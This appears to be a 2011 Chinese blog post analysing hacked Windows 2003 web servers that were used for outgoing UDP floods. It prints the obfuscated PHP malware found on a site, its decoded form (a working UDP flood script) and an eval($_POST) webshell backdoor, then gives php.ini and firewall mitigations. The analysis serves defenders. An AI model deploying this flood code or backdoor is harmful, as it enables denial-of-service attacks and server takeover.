快捷導(dǎo)航

win2003遭受udp攻擊導(dǎo)致帶寬占用很大

更新時(shí)間：2011年01月06日 19:07:43 作者：

朋友國(guó)外的機(jī)器帶寬突然跑的很大,網(wǎng)站不多,后來(lái)說(shuō)是把對(duì)外的udp端口給封了就好了.后來(lái)在國(guó)內(nèi)一個(gè)放企業(yè)站上面也出現(xiàn)過(guò)如此的情況.

后來(lái)發(fā)現(xiàn)在一個(gè)網(wǎng)站里面發(fā)現(xiàn)一個(gè)加密的.解密后看到很熟悉的 udp 莫非有關(guān)系?.果然也有朋友遇到這樣的情況,看來(lái)封禁對(duì)外udp是很必要的,

以下為轉(zhuǎn)帖:

關(guān)于近期一些服務(wù)器遭受UDP攻擊的說(shuō)明
近來(lái)我有一兩臺(tái)服務(wù)器顯示經(jīng)常受到udp攻擊
導(dǎo)致服務(wù)器帶寬占用到100%，用華盾查流量占用也無(wú)法查到具體是哪個(gè)站被攻擊了，起初以為是cc攻擊，因?yàn)橥Ｖ沽薸is帶寬就為0了，其實(shí)不然，都是部分用戶(hù)被入侵導(dǎo)致的
下面我想說(shuō)一下被入侵的原理
用戶(hù)程序中的一個(gè)php頁(yè)面的原代碼:
<?php
/*
gl
*/
eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
經(jīng)過(guò)N次解密后的代碼：

復(fù)制代碼代碼如下:

 
<?php 
$packets = 0; 
$ip = $_GET[\'ip\']; 
$rand = $_GET[\'port\']; 
set_time_limit(0); 
ignore_user_abort(FALSE); 
$exec_time = $_GET[\'time\']; 
$time = time(); 
print \"Flooded: $ip on port $rand <br><br>\"; 
$max_time = $time+$exec_time; 

for($i=0;$i<65535;$i++){ 
$out .= \"X\"; 
} 
while(1){ 
$packets++; 
if(time() > $max_time){ 
break; 
} 
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5); 
if($fp){ 
fwrite($fp, $out); 
fclose($fp); 
} 
} 
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\"; 
?> 
<?php eval($_POST[ddos])?> 

baidu了一下工作原理：
先把你代碼放到一個(gè)正常的網(wǎng)頁(yè)中.
通過(guò)url傳遞IP和端口以u(píng)dp的方式打開(kāi).傳遞文件到服務(wù)器寫(xiě)出.
這樣服務(wù)器就中招了.
也就是服務(wù)器顯示udp攻擊，帶寬占用非常之嚴(yán)重，基本是100%，一般徘徊在97%-99%之間
解決方案：
在php.ini中限制php用網(wǎng)絡(luò)。
在php.ini里設(shè)其值為Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;號(hào)一定要有,意思就是限制用sockets.dll
然后重啟IIS
我沒(méi)關(guān)這個(gè)函數(shù),有的程序需要貌似,直接把udp出站端口給封了.

您可能感興趣的文章: